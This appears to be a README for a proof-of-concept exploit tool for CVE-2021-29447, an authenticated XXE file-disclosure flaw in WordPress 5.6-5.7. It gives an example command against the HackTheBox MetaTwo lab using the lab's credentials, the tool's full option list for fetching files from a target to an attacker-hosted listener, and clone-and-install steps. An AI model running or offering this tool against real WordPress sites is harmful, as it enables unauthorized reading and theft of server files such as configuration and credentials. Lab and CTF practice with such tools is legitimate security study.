POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. More about this CVE here
Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress website with Media Library vulnerable to XXE Injection.
python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist
usage: lfi.py [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
[filenames ...]
positional arguments:
filenames Filenames to fetch
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to user in authenticated upload
-p PASSWORD, --password PASSWORD
Password to user in authenticated upload
-t TARGET, --target TARGET
Remote host to target, e.g. "metapress.htb"
-lh LHOST, --host LHOST
Hostname on which server is bound (default "")
-lp LPORT, --port LPORT
Listening port (default "8080")
-w WORDLIST, --wordlist WORDLIST
Wordlist of filenames to be fetched
-i, --interactive Runs in interactive mode
-v, --verbose Enables verbose mode
-s, --skip Skip php server spin-up (MAKE SURE IT IS ALREADY RUNNING!)
Make sure you have php installed.
git clone https://github.com/viardant/CVE-2021-29447
cd CVE-2021-29447
pip install -r requirements.txt